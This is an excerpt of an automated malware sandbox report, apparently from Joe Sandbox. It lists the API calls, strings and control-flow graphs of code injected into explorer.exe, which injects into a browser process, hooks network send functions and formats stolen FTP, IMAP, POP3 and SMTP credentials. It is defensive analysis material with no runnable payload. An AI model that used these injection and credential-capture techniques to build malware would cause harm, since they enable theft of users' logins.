                                                                        • Snapshot File: hcaresult_15_2_b46000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 25591f01ca5ec2c248db010ad09f19e55b88aea9cb05b3ceac55c40658514109
                                                                        • Instruction ID: c49f20a1fb5496f0e51d5e57846ffdc6888f462882b14c09b76c95df5691eadf
                                                                        • Opcode Fuzzy Hash: 25591f01ca5ec2c248db010ad09f19e55b88aea9cb05b3ceac55c40658514109
                                                                        • Instruction Fuzzy Hash: 0451087198C3924FD7218A78CCD46A07BE0DB52320B5906F9C5E5CB3C6EF945E05E7A1

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 167 b42861-b42871 GetProcessHeap RtlAllocateHeap
                                                                        APIs
                                                                        • GetProcessHeap.KERNEL32(00000008,0000A000,00B410CC), ref: 00B42864
                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B4286B
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.4138340959.0000000000B41000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B41000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_b41000_explorer.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Heap$AllocateProcess
                                                                        • String ID:
                                                                        • API String ID: 1357844191-0
                                                                        • Opcode ID: e08572738de17633817dfb78fa8009473990d8d2f220303060e31a19a1ad71a2
                                                                        • Instruction ID: f125300b1fd9c49c925768133ab0ab383e4faea7bf8c605a810a16bdfb36dad8
                                                                        • Opcode Fuzzy Hash: e08572738de17633817dfb78fa8009473990d8d2f220303060e31a19a1ad71a2
                                                                        • Instruction Fuzzy Hash: C7A012744001007FDD5027E0AC0DF053A59B742B01F0402007109C6160CD64034C8721

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 00B42608: VirtualQuery.KERNEL32(00B44434,?,0000001C), ref: 00B42615
                                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,74DEE800,microsoftedgecp.exe,?), ref: 00B4184E
                                                                        • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 00B41889
                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00B41919
                                                                        • RtlMoveMemory.NTDLL(00000000,00B43428,00000016), ref: 00B41940
                                                                        • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00B41968
                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00B41978
                                                                        • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B41992
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 00B4199A
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00B419A8
                                                                        • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00B419AF
                                                                        • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00B419C5
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00B419CC
                                                                        • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00B419E2
                                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00B41A0C
                                                                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B41A1F
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00B41A26
                                                                        • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00B41A2D
                                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00B41A41
                                                                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00B41A58
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00B41A65
                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00B41A6B
                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00B41A71
                                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00B41A74
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.4138340959.0000000000B41000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B41000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_b41000_explorer.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                                        • String ID: atan$microsoftedgecp.exe$ntdll$opera_shared_counter
                                                                        • API String ID: 1066286714-4141090125
                                                                        • Opcode ID: 37133d54c06bdb4dfbaa8e3a5c00b10f81c029a6323d3d804cd21d801191b3d0
                                                                        • Instruction ID: fec5856f6fcc9ab00adf746741c7a27db3dc5a39df0d4eaa4d85d7cc6e74e199
                                                                        • Opcode Fuzzy Hash: 37133d54c06bdb4dfbaa8e3a5c00b10f81c029a6323d3d804cd21d801191b3d0
                                                                        • Instruction Fuzzy Hash: 4A619B35605304AFD710DF689C84E6BBBECFF8AB50F080A59F959A3251DB70DB448B62

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00B4265A
                                                                        • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00B42672
                                                                        • lstrlen.KERNEL32(?,00000000), ref: 00B4267A
                                                                        • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00B42685
                                                                        • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 00B4269F
                                                                        • wsprintfA.USER32 ref: 00B426B6
                                                                        • CryptDestroyHash.ADVAPI32(?), ref: 00B426CF
                                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00B426D9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.4138340959.0000000000B41000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B41000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_b41000_explorer.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                                        • String ID: %02X
                                                                        • API String ID: 3341110664-436463671
                                                                        • Opcode ID: 1a869b16babc9d231489b4e6a608bb0f607b93706abbfe7e29c5327ab8fad698
                                                                        • Instruction ID: b33b4161958eabe4fc047403a7e1a431ae3d5fb1dab2567fe82030e3fde2c0a3
                                                                        • Opcode Fuzzy Hash: 1a869b16babc9d231489b4e6a608bb0f607b93706abbfe7e29c5327ab8fad698
                                                                        • Instruction Fuzzy Hash: 11112B75900108BFDB119B95EC88FAEBFFCFB45B41F1441A5F605E2260DA714F01AB60

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 421 b41b17-b41b2c 422 b41b60-b41b68 421->422 423 b41b2e 421->423 425 b41bc3-b41bcb 422->425 426 b41b6a-b41b6f 422->426 424 b41b30-b41b5e RtlMoveMemory 423->424 424->422 424->424 427 b41bcd-b41bdf 425->427 428 b41c0b 425->428 429 b41bbe-b41bc1 426->429 427->428 431 b41be1-b41bfe LdrProcessRelocationBlock 427->431 432 b41c0d-b41c12 428->432 429->425 430 b41b71-b41b84 LoadLibraryA 429->430 434 b41c15-b41c17 430->434 435 b41b8a-b41b8f 430->435 431->428 433 b41c00-b41c04 431->433 433->428 436 b41c06-b41c09 433->436 434->432 437 b41bb6-b41bb9 435->437 436->428 436->431 438 b41b91-b41b95 437->438 439 b41bbb 437->439 440 b41b97-b41b9a 438->440 441 b41b9c-b41b9f 438->441 439->429 442 b41ba1-b41bab GetProcAddress 440->442 441->442 442->434 443 b41bad-b41bb3 442->443 443->437
                                                                        APIs
                                                                        • RtlMoveMemory.NTDLL(?,?,?), ref: 00B41B4E
                                                                        • LoadLibraryA.KERNEL32(?,00B44434,00000000,00000000,74DF2EE0,00000000,00B41910,?,?,?,00000001,?,00000000), ref: 00B41B76
                                                                        • GetProcAddress.KERNEL32(00000000,-00000002), ref: 00B41BA3
                                                                        • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00B41BF4
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.4138340959.0000000000B41000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B41000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_b41000_explorer.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                                        • String ID:
                                                                        • API String ID: 3827878703-0
                                                                        • Opcode ID: ff5bdd2ab6ebabf73a0f4711d39ca826c3b877fc3337be343ac1b2ff4d1293d9
                                                                        • Instruction ID: f1b5ba904ac314331faaf8a77af65b673bf1199fe885ea503bef4ddb57ce67fd
                                                                        • Opcode Fuzzy Hash: ff5bdd2ab6ebabf73a0f4711d39ca826c3b877fc3337be343ac1b2ff4d1293d9
                                                                        • Instruction Fuzzy Hash: AD319E75B00215ABCB24CF2DCCC4B76B7E8FF15315B1449ACE886CB601E731EA859BA4

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 00B42861: GetProcessHeap.KERNEL32(00000008,0000A000,00B410CC), ref: 00B42864
                                                                          • Part of subcall function 00B42861: RtlAllocateHeap.NTDLL(00000000), ref: 00B4286B
                                                                        • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,00B4109E,?,00B41010), ref: 00B4134A
                                                                        • GetCurrentProcessId.KERNEL32(00000003,?,00B4109E,?,00B41010), ref: 00B4135B
                                                                        • wsprintfA.USER32 ref: 00B41372
                                                                          • Part of subcall function 00B4263E: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00B4265A
                                                                          • Part of subcall function 00B4263E: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00B42672
                                                                          • Part of subcall function 00B4263E: lstrlen.KERNEL32(?,00000000), ref: 00B4267A
                                                                          • Part of subcall function 00B4263E: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00B42685
                                                                          • Part of subcall function 00B4263E: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 00B4269F
                                                                          • Part of subcall function 00B4263E: wsprintfA.USER32 ref: 00B426B6
                                                                          • Part of subcall function 00B4263E: CryptDestroyHash.ADVAPI32(?), ref: 00B426CF
                                                                          • Part of subcall function 00B4263E: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00B426D9
                                                                        • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00B41389
                                                                        • GetLastError.KERNEL32 ref: 00B4138F
                                                                        • Sleep.KERNEL32(000001F4), ref: 00B413A1
                                                                          • Part of subcall function 00B424D5: GetCurrentProcessId.KERNEL32 ref: 00B424E7
                                                                          • Part of subcall function 00B424D5: GetCurrentThreadId.KERNEL32 ref: 00B424EF
                                                                          • Part of subcall function 00B424D5: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00B424FF
                                                                          • Part of subcall function 00B424D5: Thread32First.KERNEL32(00000000,0000001C), ref: 00B4250D
                                                                          • Part of subcall function 00B424D5: CloseHandle.KERNEL32(00000000), ref: 00B42566
                                                                        • GetModuleHandleA.KERNEL32(ws2_32.dll,send), ref: 00B413B8
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00B413BF
                                                                        • GetModuleHandleA.KERNEL32(ws2_32.dll,WSASend), ref: 00B413E4
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00B413EB
                                                                          • Part of subcall function 00B41DE3: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 00B41E1D
                                                                        • RtlExitUserThread.NTDLL(00000000), ref: 00B4141D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.4138340959.0000000000B41000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B41000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_b41000_explorer.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Crypt$Hash$CreateCurrentHandleModuleProcess$AddressContextHeapProcThreadwsprintf$AcquireAllocateCloseDataDestroyErrorExitFileFirstLastMemoryMoveMutexNameParamReleaseSleepSnapshotThread32Toolhelp32Userlstrlen
                                                                        • String ID: %s%d%d%d$WSASend$send$ws2_32.dll
                                                                        • API String ID: 706757162-1430290102
                                                                        • Opcode ID: ba47c6c144f6daf6e542d73ef8737b4e0dcd8e1364e03c9ed819256455a38078
                                                                        • Instruction ID: 5d957d5588b1c1dd946c75e039cf51a4ae199ae8afa40716936e8124a73a53ce
                                                                        • Opcode Fuzzy Hash: ba47c6c144f6daf6e542d73ef8737b4e0dcd8e1364e03c9ed819256455a38078
                                                                        • Instruction Fuzzy Hash: 4731A435740214BBCB106FA4DD0AB5E3BE9FF06B41F184594FA05A73A1CFB58B51AB90

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 235 b41647-b4165a 236 b41660-b41662 235->236 237 b41748-b4174f 235->237 236->237 238 b41668-b4166b 236->238 238->237 239 b41671-b4167d lstrlen 238->239 240 b41747 239->240 241 b41683-b4168a lstrlen 239->241 240->237 241->240 242 b41690-b416a8 getpeername 241->242 242->240 243 b416ae-b416ca inet_ntoa htons 242->243 243->240 244 b416cc-b416d4 243->244 245 b416d6-b416d9 244->245 246 b41708 244->246 247 b416f3-b416f8 245->247 248 b416db-b416de 245->248 249 b4170d-b4173c call b42861 wsprintfA call b424ae 246->249 247->249 250 b416e0-b416e3 248->250 251 b41701-b41706 248->251 249->240 259 b4173e-b41745 call b42843 249->259 253 b416e5-b416ea 250->253 254 b416fa-b416ff 250->254 251->249 253->247 256 b416ec-b416f1 253->256 254->249 256->240 256->247 259->240
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.4138340959.0000000000B41000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B41000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_b41000_explorer.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrlen$getpeernamehtonsinet_ntoawsprintf
                                                                        • String ID: ftp://%s:%s@%s:%d$imap://%s:%s@%s:%d$pop3://%s:%s@%s:%d$smtp://%s:%s@%s:%d
                                                                        • API String ID: 3379139566-1703351401
                                                                        • Opcode ID: 275d9f17de46e4e09467f43ae8ed35e6c55e5da2686338ce19406b22a2c167df
                                                                        • Instruction ID: d730871699b00737522296f55953012b3758abd428333727bdbabbcdd0ae830f
                                                                        • Opcode Fuzzy Hash: 275d9f17de46e4e09467f43ae8ed35e6c55e5da2686338ce19406b22a2c167df
                                                                        • Instruction Fuzzy Hash: F721B2B6E00219ABDF105FAD8D885BE7AEDEF45701B1845F5E904E3211DA34CF80BA60

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 267 b41752-b41774 GetModuleHandleA GetProcAddress 268 b41776-b417c0 RtlZeroMemory * 4 267->268 269 b417c1-b417c6 267->269 268->269
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(ntdll.dll,sscanf,?,?,?,00B41539,?,?,?,00B4144B,?), ref: 00B41763
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00B4176A
                                                                        • RtlZeroMemory.NTDLL(00B44228,00000104), ref: 00B41788
                                                                        • RtlZeroMemory.NTDLL(00B44118,00000104), ref: 00B41790
                                                                        • RtlZeroMemory.NTDLL(00B44330,00000104), ref: 00B41798
                                                                        • RtlZeroMemory.NTDLL(00B44000,00000104), ref: 00B417A1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.4138340959.0000000000B41000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B41000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_b41000_explorer.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MemoryZero$AddressHandleModuleProc
                                                                        • String ID: %s%s%s%s$ntdll.dll$sscanf
                                                                        • API String ID: 1490332519-278825019
                                                                        • Opcode ID: 44e1c0aeef004f6ef396bd63fd74ea8edc650139613e176379d372d3937f2907
                                                                        • Instruction ID: 2964a528c3673aa7cf9d8b33a207ffe3c12e45cd1c8564717569cac4757ac611
                                                                        • Opcode Fuzzy Hash: 44e1c0aeef004f6ef396bd63fd74ea8edc650139613e176379d372d3937f2907
                                                                        • Instruction Fuzzy Hash: 01F0896278072C33812023AA7C06F57BDDCD656FE631A02E1B60463261DED56B1065B5

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetCurrentProcessId.KERNEL32 ref: 00B424E7
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00B424EF
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00B424FF
                                                                        • Thread32First.KERNEL32(00000000,0000001C), ref: 00B4250D
                                                                        • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 00B4252C
                                                                        • SuspendThread.KERNEL32(00000000), ref: 00B4253C
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B4254B
                                                                        • Thread32Next.KERNEL32(00000000,0000001C), ref: 00B4255B
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B42566
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.4138340959.0000000000B41000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B41000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_b41000_explorer.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                                        • String ID:
                                                                        • API String ID: 1467098526-0
                                                                        • Opcode ID: d557c3a34fafbede8c35d15c368f64cc731cdfec4f606fcd75202546aad6fbfe
                                                                        • Instruction ID: 5d71c84efd42748ecef2d2b715f91f550ea8b3b00f581195cf6a98ffd36fbafe
                                                                        • Opcode Fuzzy Hash: d557c3a34fafbede8c35d15c368f64cc731cdfec4f606fcd75202546aad6fbfe
                                                                        • Instruction Fuzzy Hash: 5A115E75404211EFD7119F60AC5DB6EBBF8FF96B41F080659F64193250DB308B49ABA2

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 281 b41f4a-b41fa5 call b422b8 call b42861 call b427e2 call b42374 290 b41fa7-b41fbe 281->290 291 b41fc0-b41fcc 281->291 294 b41fd0-b41fd2 290->294 291->294 295 b422a6-b422b5 call b42843 294->295 296 b41fd8-b4200f RtlZeroMemory 294->296 300 b42015-b42030 296->300 301 b4229e-b422a5 296->301 302 b42062-b42074 300->302 303 b42032-b42043 call b422e5 300->303 301->295 308 b42078-b4207a 302->308 309 b42045-b42054 303->309 310 b42056 303->310 311 b42080-b420dc call b42731 308->311 312 b4228b-b42291 308->312 313 b42058-b42060 309->313 310->313 321 b42284 311->321 322 b420e2-b420e7 311->322 316 b42293-b42295 call b42843 312->316 317 b4229a 312->317 313->308 316->317 317->301 321->312 323 b42101-b4212f call b42861 wsprintfW 322->323 324 b420e9-b420fa 322->324 327 b42131-b42133 323->327 328 b42148-b4215f 323->328 324->323 329 b42134-b42137 327->329 334 b42161-b42197 call b42861 wsprintfW 328->334 335 b4219e-b421b8 328->335 330 b42142-b42144 329->330 331 b42139-b4213e 329->331 330->328 331->329 333 b42140 331->333 333->328 334->335 339 b42261-b42277 call b42843 335->339 340 b421be-b421d1 335->340 348 b42280 339->348 349 b42279-b4227b call b42843 339->349 340->339 343 b421d7-b421ed call b42861 340->343 350 b421ef-b421fa 343->350 348->321 349->348 352 b421fc-b42209 call b42826 350->352 353 b4220e-b42225 350->353 352->353 357 b42227 353->357 358 b42229-b42236 353->358 357->358 358->350 359 b42238-b4223c 358->359 360 b42256-b4225d call b42843 359->360 361 b4223e 359->361 360->339 363 b4223e call b42815 361->363 365 b42243-b42250 RtlMoveMemory 363->365 365->360
                                                                        APIs
                                                                          • Part of subcall function 00B42861: GetProcessHeap.KERNEL32(00000008,0000A000,00B410CC), ref: 00B42864
                                                                          • Part of subcall function 00B42861: RtlAllocateHeap.NTDLL(00000000), ref: 00B4286B
                                                                          • Part of subcall function 00B427E2: lstrlen.KERNEL32(00B440DA,?,00000000,00000000,00B41F86,74DE8A60,00B440DA,00000000), ref: 00B427EA
                                                                          • Part of subcall function 00B427E2: MultiByteToWideChar.KERNEL32(00000000,00000000,00B440DA,00000001,00000000,00000000), ref: 00B427FC
                                                                          • Part of subcall function 00B42374: RtlZeroMemory.NTDLL(?,00000018), ref: 00B42386
                                                                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 00B41FE2
                                                                        • wsprintfW.USER32 ref: 00B4211B
                                                                        • wsprintfW.USER32 ref: 00B42186
                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00B42250
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.4138340959.0000000000B41000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B41000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_b41000_explorer.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                                        • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                                        • API String ID: 4204651544-1701262698
                                                                        • Opcode ID: 6df755f394500850f2ce410eb9d3dde3da5d0193a7dba5b309fac055c1e993ad
                                                                        • Instruction ID: b239189c7ceb306a67602433fc9220cb866bc1d3a6e269c813ca5b92a87e57b0
                                                                        • Opcode Fuzzy Hash: 6df755f394500850f2ce410eb9d3dde3da5d0193a7dba5b309fac055c1e993ad
                                                                        • Instruction Fuzzy Hash: 3AA16875608301AFD7209F68D885A2BBBE8FF89740F54096DF985D3361DA70DF04AB62

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 366 b425ad-b425c9 OpenProcess 367 b42600-b42607 366->367 368 b425cb-b425da IsWow64Process 366->368 369 b425f7 368->369 370 b425dc-b425ec IsWow64Process 368->370 372 b425f9-b425fa CloseHandle 369->372 371 b425ee-b425f5 370->371 370->372 371->372 372->367
                                                                        APIs
                                                                        • OpenProcess.KERNEL32(00000400,00000000,?,74DEE800,?,?,microsoftedgecp.exe,00B41287), ref: 00B425BF
                                                                        • IsWow64Process.KERNEL32(000000FF,?), ref: 00B425D1
                                                                        • IsWow64Process.KERNEL32(00000000,?), ref: 00B425E4
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B425FA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.4138340959.0000000000B41000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B41000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_b41000_explorer.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Process$Wow64$CloseHandleOpen
                                                                        • String ID: microsoftedgecp.exe
                                                                        • API String ID: 331459951-1475183003
                                                                        • Opcode ID: d6a90ca35b1b8a4c3e53c82d558cf7c3ca933c380a6106a8cefd49133614752b
                                                                        • Instruction ID: 4ca6adc8218ed93f7b01407d9cdb21ddac6bec0c1b77f75795d4533443d90caf
                                                                        • Opcode Fuzzy Hash: d6a90ca35b1b8a4c3e53c82d558cf7c3ca933c380a6106a8cefd49133614752b
                                                                        • Instruction Fuzzy Hash: 15F03075942618FF9B10DF949D989EE77ECEB02655B5803AAF90493240DB314F04F6A4

                                                                        Execution Graph

                                                                        Execution Coverage:8.8%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:9
                                                                        Total number of Limit Nodes:2
                                                                        execution_graph 765 119fab 766 11a1f3 765->766 767 119fd8 765->767 770 11a048 767->770 774 11a04d 770->774 771 11a190 VirtualProtect VirtualProtect 773 11a1e8 771->773 772 11a135 LoadLibraryA 772->774 773->773 774->771 774->772 775 119ff8 774->775

                                                                        Callgraph

                                                                        • Executed
                                                                        • Not Executed
                                                                        • Opacity -> Relevance
                                                                        • Disassembly available
                                                                        callgraph 0 Function_00112010 8 Function_00111A04 0->8 1 Function_0011B115 2 Function_00112E98 2->8 13 Function_00112E08 2->13 21 Function_00112CB8 2->21 36 Function_00111DD4 2->36 47 Function_00112B70 2->47 50 Function_00112BF4 2->50 3 Function_00112418 19 Function_00111838 3->19 37 Function_00112054 3->37 56 Function_00111860 3->56 4 Function_0011141D 5 Function_00111000 6 Function_00112E80 7 Function_00111405 9 Function_00111508 10 Function_00111A88 11 Function_00111C08 12 Function_00112508 32 Function_001118D0 12->32 43 Function_001125C4 12->43 55 Function_001124E0 12->55 13->3 31 Function_00111D50 13->31 13->56 59 Function_001118E8 13->59 14 Function_00113088 14->2 45 Function_00111B70 14->45 15 Function_0011A00A 16 Function_0011188C 16->19 17 Function_00111BB0 18 Function_001114B2 20 Function_00111938 21->19 25 Function_00111D20 21->25 21->56 22 Function_001141A1 23 Function_00113220 23->11 23->17 23->19 23->20 29 Function_00111C28 23->29 23->45 58 Function_00112860 23->58 24 Function_00112620 26 Function_00113020 26->2 26->45 27 Function_00111822 28 Function_001145A7 30 Function_00119FAB 44 Function_0011A048 30->44 31->19 33 Function_0011B0D5 34 Function_00111254 35 Function_001114D4 36->19 37->0 37->16 37->19 37->20 37->32 42 Function_00111F40 37->42 46 Function_00111E70 37->46 53 Function_001118F8 37->53 37->56 38 Function_00114059 39 Function_00111C58 40 Function_0011355C 40->19 40->23 40->40 40->45 48 Function_001130F0 40->48 41 Function_00114A41 42->19 42->53 54 Function_001125FC 43->54 44->15 47->8 47->19 48->10 48->12 48->19 48->39 48->56 49 Function_00112774 51 Function_00111576 52 Function_001114F9 56->45 57 Function_00111560 58->24 58->45 58->49 60 Function_0011156C

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 119 11355c-11356c call 111b70 122 113572-1135a5 call 111838 119->122 123 1135fc-113601 119->123 127 1135d1-1135f6 NtUnmapViewOfSection 122->127 128 1135a7 call 111838 122->128 132 113608-113617 call 113220 127->132 133 1135f8-1135fa 127->133 130 1135ac-1135c5 128->130 130->127 139 113621-11362a 132->139 140 113619-11361c call 11355c 132->140 133->123 134 113602-113607 call 1130f0 133->134 134->132 140->139
                                                                        APIs
                                                                        • NtUnmapViewOfSection.NTDLL ref: 001135D8
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4137644244.0000000000111000.00000040.80000000.00040000.00000000.sdmp, Offset: 00111000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_111000_explorer.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: SectionUnmapView
                                                                        • String ID:
                                                                        • API String ID: 498011366-0
                                                                        • Opcode ID: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                                                        • Instruction ID: 8ddc68f57b64bc19337205630927bc3d17bc1b928bd7f62644af2135c8f77e67
                                                                        • Opcode Fuzzy Hash: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                                                        • Instruction Fuzzy Hash: B111C430615E095FEB5CFBB8989D2B937A1EB24301F54013AA429C76A5DB398A80C701

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 113220-11325b call 111838 3 113261-113273 CreateToolhelp32Snapshot 0->3 4 113549-113554 SleepEx 3->4 5 113279-11328f Process32First 3->5 4->3 6 113538-11353a 5->6 7 113540-113543 CloseHandle 6->7 8 113294-1132ac 6->8 7->4 10 1132b2-1132c6 8->10 11 11348c-113495 call 111bb0 8->11 10->11 17 1132cc-1132e0 10->17 15 11349b-1134a4 call 111c08 11->15 16 11352a-113532 Process32Next 11->16 15->16 21 1134aa-1134b1 call 111c28 15->21 16->6 17->11 22 1132e6-1132fa 17->22 21->16 26 1134b3-1134c1 call 111b70 21->26 22->11 27 113300-113314 22->27 26->16 32 1134c3-113525 call 111938 call 112860 call 111938 26->32 27->11 31 11331a-11332e 27->31 31->11 35 113334-113348 31->35 32->16 35->11 40 11334e-113362 35->40 40->11 44 113368-11337c 40->44 44->11 46 113382-113396 44->46 46->11 48 11339c-1133b0 46->48 48->11 50 1133b6-1133ca 48->50 50->11 52 1133d0-1133e4 50->52 52->11 54 1133ea-1133fe 52->54 54->11 56 113404-113418 54->56 56->11 58 11341a-11342e 56->58 58->11 60 113430-113444 58->60 60->11 62 113446-11345a 60->62 62->11 64 11345c-113470 62->64 64->11 66 113472-113486 64->66 66->11 66->16
